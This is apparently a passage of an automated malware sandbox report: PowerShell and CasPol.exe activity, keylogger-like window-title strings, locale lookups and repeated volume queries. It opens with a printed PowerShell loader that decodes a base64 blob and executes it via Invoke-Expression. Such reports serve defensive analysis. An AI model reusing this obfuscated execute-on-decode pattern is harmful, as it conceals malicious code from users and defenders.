pemvzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhbob3nwagf0axplcy5jbnzva2uojg51bgwsieaojzavd21ndegvci9lzs5ldhnhcc8vonnwdhrojywgjyrjzwrhcnmnlcanjgnlzgfycycsiccky2vkyxjzjywgj0nhc1bvbccsiccky2vkyxjzjywgjyrjzwrhcnmnlccky2vkyxjzjywnjgnlzgfycycsjyrjzwrhcnmnlccky2vkyxjzjywnjgnlzgfycycsjzenlccky2vkyxjzjywnjykpow==';$periblem = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($antimagistrical));invoke-expression $periblemJump to behavior
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-T:
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIT^
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6P+
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRPO
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerwPj
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.drBinary or memory string: [Program Manager]
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager~PS
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageruTb
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]P0
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager <T
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernutes }
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerePx
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?T$
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager$P9
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageryPT
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerlPa
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
